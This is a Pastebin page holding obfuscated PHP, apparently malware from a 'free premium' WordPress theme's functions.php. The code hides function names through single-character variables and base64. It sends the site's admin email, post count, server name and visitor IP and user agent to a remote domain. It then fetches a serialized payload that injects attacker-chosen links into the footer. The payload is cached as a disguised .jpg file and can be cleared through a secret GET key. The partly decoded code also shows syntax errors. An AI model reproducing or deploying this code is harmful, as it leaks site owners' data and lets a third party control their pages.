API tools faq
paste
Guest User

Untitled

a guest
Feb 12th, 2013
129
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.51 KB | None | 0 0
raw download clone embed print report
  1. define("WP_ID", 'base64_decode'("Mi4wLjA="));
  2. define("WP_TTL", 'base64_decode'("MTA4MDA="));
  3. define("WP_SRC", 'base64_decode'("dHV1Ym4="));
  4.  
  5. function wp_get_header() {
  6. global 'base64_decode', 'function_exists';
  7. if ('function_exists'("wp_theme_powered_by") && 'function_exists'("wp_get_footer")) &&'function_exists'("wp_cv_verify")) {
  8.   get_header(); }
  9. }
  10.  
  11. function wp_get_footer() {
  12.   get_footer();
  13.   wp_cv_verify();
  14. }
  15.  
  16. function wp_cv_verify() {
  17. global 'base64_decode', 'fopen', 'fclose', 'fread';
  18. $template_footer_path = TEMPLATEPATH."/footer.php";
  19. $template_footer_file = @'fopen'($template_footer_path, "r");
  20. $template_footer_path = @'fread'($template_footer_file, @filesize($template_footer_path));
  21. @'fclose'($template_footer_file);
  22. $temp_var = TEMPLATEPATH."/functions.php";
  23. $template_footer_file = @'fopen'($temp_var, "r");
  24. $temp_var = @'fread'($template_footer_file, @filesize($temp_var));
  25. @'fclose'($template_footer_file);
  26. $footer_check = 0;
  27. if($template_footer_path && $temp_var) {
  28.   if ("free-premium-wordpress-themes.com") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
  29.     if (substr_count($template_footer_path, "free-premium-wordpress-themes.com") < 2) {
  30.       $footer_check = 1;
  31.     }
  32.     if (substr_count($template_footer_path, "wp_theme_powered_by()") < 1) {
  33.       $footer_check = 2;
  34.     }
  35.   }
  36.   if(WP_ID != "2.0.0") {
  37.     $footer_check = 12;
  38.     }
  39.   }
  40.   if($footer_check > 0) {
  41.     echo "<div style=\"position: fixed;
  42.    bottom:0;
  43.    left:0;
  44.    width:100%;
  45.    height: 25px;
  46.    background-color: red;
  47.    color: white;
  48.    font-size: 16px;
  49.    padding: 2px 10px;
  50.    text-align: center;
  51. \"> <strong> This themes is powered by <a href=\"http://www.free-premium-wordpress-themes.com\" style=\"color: white;
  52. \">Free Premium Wordpress Themes</a>. This website violated the terms of use <a href=\"http://www.free-premium-wordpress-themes.com\" style=\"color: white;
  53. \">Free Premium Wordpress Themes</a> </strong> </div>";
  54. echo "<!-- v: $footer_check -->";
  55.   }
  56. }
  57.  
  58. function wp_loaded() {
  59.   global 'base64_decode', 'function_exists';
  60.   return 'function_exists'("wp_theme_powered_by");
  61. }
  62.  
  63. $iz___________n='s';
  64. $sf_____________d='_';
  65. $gw__h='o';
  66. $sn__________p='r';
  67. $rf_______a='m';
  68. $bt___________d='o';
  69. $kg_______i='e';
  70. $yi________r='i';
  71. $bv____c='r';
  72. $lz_____________n='a';
  73. $wa___t='n';
  74. $fc_________d='p';
  75. $lc_____h='v';
  76. $ia________s='c';
  77. $os_______g='e';
  78. $js________g=$lc_____h.$kg_______i.$bv____c.$iz___________n.$yi________r.$bt___________d.$wa___t.$sf_____________d.$ia________s.$gw__h.$rf_______a.$fc_________d.$lz_____________n.$sn__________p.$os_______g;
  79. $qj_____________j='e';
  80. $li____d='o';
  81. $kx__h='p';
  82. $ew___________s='k';
  83. $lu______r='n';
  84. $jj___________g='c';
  85. $tb_______________z='f';
  86. $ez____b='o';
  87. $fh_______m='s';
  88. $ud__m=$tb_______________z.$fh_______m.$ez____b.$jj___________g.$ew___________s.$li____d.$kx__h.$qj_____________j.$lu______r;
  89. $wh_________g='t';
  90. $ik________z='r';
  91. $kw_____________g='i';
  92. $sx______________u='f';
  93. $rb___k='w';
  94. $zy__p='e';
  95. $ws_____________s=$sx______________u.$rb___k.$ik________z.$kw_____________g.$wh_________g.$zy__p;
  96. $tm__________q='d';
  97. $td______________t='5';
  98. $zx___________j='m';
  99. $us_______________l=$zx___________j.$tm__________q.$td______________t;
  100. $yb___q='a';
  101. $pj__________e='p';
  102. $ac____q='h';
  103. $py____e='r';
  104. $zv___j='e';
  105. $qp____________y='t';
  106. $be________w='a';
  107. $jm______p='l';
  108. $kz_____________g=$py____e.$zv___j.$yb___q.$jm______p.$pj__________e.$be________w.$qp____________y.$ac____q;
  109. $yo______p='u';
  110. $bi_______________z='l';
  111. $cn____c='z';
  112. $xw____f='i';
  113. $qt___________m='e';
  114. $ze______h='s';
  115. $yr________f='a';
  116. $sn_______i='e';
  117. $tu______________o='n';
  118. $wi__________q='i';
  119. $yb__________c='r';
  120. $mf___________p=$yo______p.$tu______________o.$ze______h.$qt___________m.$yb__________c.$xw____f.$yr________f.$bi_______________z.$wi__________q.$cn____c.$sn_______i;
  121. $ig___________k='t';
  122. $zm__________j='a';
  123. $ry_______y='e';
  124. $dn________i='m';
  125. $eq______________d='p';
  126. $ae_______________t='n';
  127. $mn____r='m';
  128. $bx______z=$ig___________k.$ry_______y.$mn____r.$eq______________d.$ae_______________t.$zm__________j.$dn________i;
  129. $sj_________j='t';
  130. $tc____________z='s';
  131. $xm__________h='e';
  132. $fd_______________z='_';
  133. $qw_________p='_';
  134. $kq_______b='t';
  135. $wj_____________u='a';
  136. $zy____z='t';
  137. $wl___z='t';
  138. $wy____w='e';
  139. $vy_____________p='m';
  140. $cz________e='r';
  141. $ty___________n='c';
  142. $bw________a='n';
  143. $kq___f='a';
  144. $fp_______________y='e';
  145. $al________k='o';
  146. $zz______r='e';
  147. $dt_________z='x';
  148. $yd________e='r';
  149. $br________b='c';
  150. $if_________k=$tc____________z.$kq_______b.$yd________e.$zz______r.$kq___f.$vy_____________p.$qw_________p.$ty___________n.$al________k.$bw________a.$zy____z.$xm__________h.$dt_________z.$sj_________j.$fd_______________z.$br________b.$cz________e.$wy____w.$wj_____________u.$wl___z.$fp_______________y;
  151. function iq__________h($rr_____________x) {global 'base64_decode', 'function_exists', 'file_get_contents', $js________g, $if_________k;
  152. if (!'function_exists'('base64_decode'("ZmlsZV9nZXRfY29udGVudHM="))) {return false;
  153. }if ($js________g(PHP_VERSION, "5.0.0", ">=") && 'function_exists'('base64_decode'("ZmlsZV9nZXRfY29udGVudHM=")) && 'function_exists'('base64_decode'("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$rn_______________n = $if_________k(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));
  154. $ww_______________u = @'file_get_contents'($rr_____________x, 0, $rn_______________n);
  155. } else {$ww_______________u = @'file_get_contents'($rr_____________x, 0);
  156. }return $ww_______________u;
  157. }function mt_______________g($rr_____________x) {global 'function_exists', $ud__m, $ws_____________s, 'base64_decode';
  158. if (!'function_exists'('base64_decode'("ZmlsZV9nZXRfY29udGVudHM="))) {return false;
  159. }$yx_______b = strpos($rr_____________x, "/", 7);
  160. $ur___________o = array("uri"     => substr($rr_____________x, $yx_______b),"host"    => str_replace("http://", "", substr($rr_____________x, 0, $yx_______b)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);
  161. $yi____________t = @$ud__m("$ur___________o[host]", 80, $yh____l, $ob______r, 4);
  162. if (!$yi____________t) {return false;
  163. } else {$ww_______________u = "";
  164. $xj____________g  = "GET $ur___________o[uri] HTTP/1.0\r\n";
  165. $xj____________g .= "Host: $ur___________o[host]\r\n";
  166. $xj____________g .= "Referer: $ur___________o[referer]\r\n";
  167. $xj____________g .= "Connection: Close\r\n\r\n";
  168. @$ws_____________s($yi____________t, $xj____________g);
  169. while (!@feof($yi____________t)) {$dm_______________h = @fgets($yi____________t, (1024*24));
  170. if ($dm_______________h == "\r\n") {$bc____v = true;
  171. continue;
  172. }if ($bc____v) {$ww_______________u .= $dm_______________h;
  173. }}return $ww_______________u;
  174. }}function lb______________y($rr_____________x) {global 'function_exists';
  175. $ub______j = false;
  176. if ($rr_____________x != "") {if ('function_exists'("iq__________h")) {$ub______j = @iq__________h($rr_____________x);
  177. }if (!$ub______j && ('function_exists'("mt_______________g"))) {$ub______j = @mt_______________g($rr_____________x);
  178. }}return $ub______j;
  179. }function hf_______e() {global $_SERVER, $us_______________l;
  180. $ah_______h = $_SERVER["SERVER_NAME"];
  181. if (substr("$ah_______h", 0, 4) == "www.") {$ah_______h = substr("$ah_______h", 4);
  182. }$ah_______h = $us_______________l("$_SERVER[SERVER_NAME]");
  183. return $ah_______h;
  184. }function vw________e() {return "file";
  185. }function gc______d($rr_____________x) {global $_SERVER, 'file_get_contents', 'file_exists', 'fopen', 'fclose', $ws_____________s;
  186. $xz___z = gm_________d();
  187. $ge______________f = hf_______e().".jpg";
  188. $vw_______________o = $xz___z["dir_upload"]["path"]."/$ge______________f";
  189. $qf_____________c = @filemtime($vw_______________o);
  190. if (!$qf_____________c || ((time()-$qf_____________c) >= WP_TTL)) {$ub______j = lb______________y($rr_____________x);
  191. if ($ub______j) {if ('file_exists'($vw_______________o)) {@unlink($vw_______________o);
  192. }$template_footer_file = @'fopen'($vw_______________o, "x+");
  193. @$ws_____________s($template_footer_file, $ub______j);
  194. @'fclose'($template_footer_file);
  195. }} else {if ('file_exists'($vw_______________o)) {$ub______j = @'file_get_contents'($vw_______________o);
  196. } else {$ub______j = false;
  197. }}return $ub______j;
  198. }function gm_________d() {global $_SERVER, 'base64_decode', 'base64_encode';
  199. $gv____u = wp_count_posts("post");
  200. $jq__i = pathinfo(get_bloginfo("template_directory"));
  201. $xz___z = array("url" => array("report"      => 'base64_decode'("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $jq__i,"dir_upload"=> wu_____________q(),"queryString"=> array("?a001=".WP_ID,"a004=".$jq__i[filename],"a005=".$gv____u->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "Powered By <a href=\"http://www.moving-themes.com\">Wordpress Themes</a>");
  202. $xz___z["url"]["queryString"] = implode("&", $xz___z["queryString"]);
  203. $xz___z["url"]["report"] = $xz___z["url"]["report"]."/?".'base64_encode'($xz___z["url"]["queryString"]).".html";
  204. return $xz___z;
  205. }function wu_____________q() {$fw______________s = wp_upload_dir();
  206. if (isset($fw______________s["error"])) {$jl___g = rb_______________t();
  207. if (is_writable($jl___g)) {$fw______________s = array("path" => $jl___g);
  208. }}return $fw______________s;
  209. }function rb_______________t() {global 'function_exists', $us_______________l, $kz_____________g, $bx______z;
  210. $be__g = (bool) ini_get("safe_mode");
  211. if ($be__g == true) {return false;
  212. }if ('function_exists'("sys_get_temp_dir")) {$ll_____________n = sys_get_temp_dir();
  213. if (is_writable($ll_____________n)) {return $kz_____________g($ll_____________n);
  214. }}if (!empty($_ENV["TMP"])) {return $kz_____________g($_ENV["TMP"]);
  215. }elseif (!empty($_ENV["TMPDIR"])) {return $kz_____________g($_ENV["TMPDIR"]);
  216. }elseif (!empty($_ENV["TEMP"])) {return $kz_____________g($_ENV["TEMP"]);
  217. } else {$wi_______________w = $bx______z($us_______________l(uniqid(rand(), true)), "");
  218. if ($wi_______________w) {$ll_____________n = $kz_____________g(dirname($wi_______________w));
  219. @unlink($wi_______________w);
  220. return $ll_____________n;
  221. } else {return false;
  222. }}}function xr___b() {global $_GET, 'file_exists';
  223. $xz___z = gm_________d();
  224. $ah_______h = hf_______e();
  225. $jx______________t = vw________e();
  226. $yj__o = "full";
  227. if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($jx______________t == "file") {$il____h = $xz___z["dir_upload"]["path"]."/".$ah_______h.".jpg";
  228. if ('file_exists'($il____h)) {@unlink($il____h);
  229. $yj__o = "deleted";
  230. }}$xh____________x = array("s"=> $yj__o,"t"=> time(),"v"=> WP_ID);
  231. echo "<!--";
  232. foreach ($xh____________x AS $cc__l => $od____________y) echo " [$cc__l:$od____________y]";
  233. echo " -->";
  234. }}function wp_theme_powered_by() {global $_SERVER, $_GET, 'function_exists', 'base64_decode', $mf___________p;
  235. $xz___z = gm_________d();
  236. $dk______________r = "gc______d";
  237. if ('function_exists'($dk______________r)) {$ww_______________u = $dk______________r($xz___z["url"]["report"]);
  238. }if ($ww_______________u) {if ($ww_______________u = @'base64_decode'($ww_______________u)) {$ww_______________u = @$mf___________p($ww_______________u);
  239. if (strlen($ww_______________u[custom_credit]) >= 5) {$xz___z["default_string"] = $ww_______________u[custom_credit];
  240. }if ($ww_______________u["status"] == "0") {$ha____________s = 1;
  241. $ib_____________u = 1;
  242. } else {$jc______________s = sizeof($ww_______________u["links"]);
  243. $cz_______________c = $xz___z["default_string"];
  244. if ($jc______________s > 0 && $ww_______________u["links"] !== "") {$lr__s = 0;
  245. foreach ($ww_______________u["links"] as $ns____p => $ls_____r) {$lr__s++;
  246. if ($ls_____r->l_path == "" || $ls_____r->l_path == $_SERVER["REQUEST_URI"]) {$ls_____r->l_href = htmlspecialchars(strip_tags($ls_____r->l_href));
  247. $ls_____r->l_title = htmlspecialchars(strip_tags($ls_____r->l_title));
  248. $ls_____r->l_anchor = htmlspecialchars(strip_tags($ls_____r->l_anchor));
  249. $cz_______________c .= " | ";
  250. $cz_______________c .= "<a href='$ls_____r->l_href' title='$ls_____r->l_title'";
  251. if ($ls_____r->l_nofollow == "1") {$cz_______________c .= " rel='nofollow'";
  252. }$cz_______________c .= ">$ls_____r->l_anchor</a>";
  253. }}}$xz___z["links"] = "$cz_______________c";
  254. if ($ww_______________u[credit] == "0") {$xz___z["links"] = "";
  255. }}} else {$ha____________s = "1";
  256. }} else {$ha____________s = "1";
  257. }if ($ha____________s == "1") {$xz___z["links"] = $xz___z["default_string"];
  258. }echo "$xz___z[links]";
  259. echo "<!-- s: $ww_______________u[signature] -->";
  260. xr___b();
  261. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!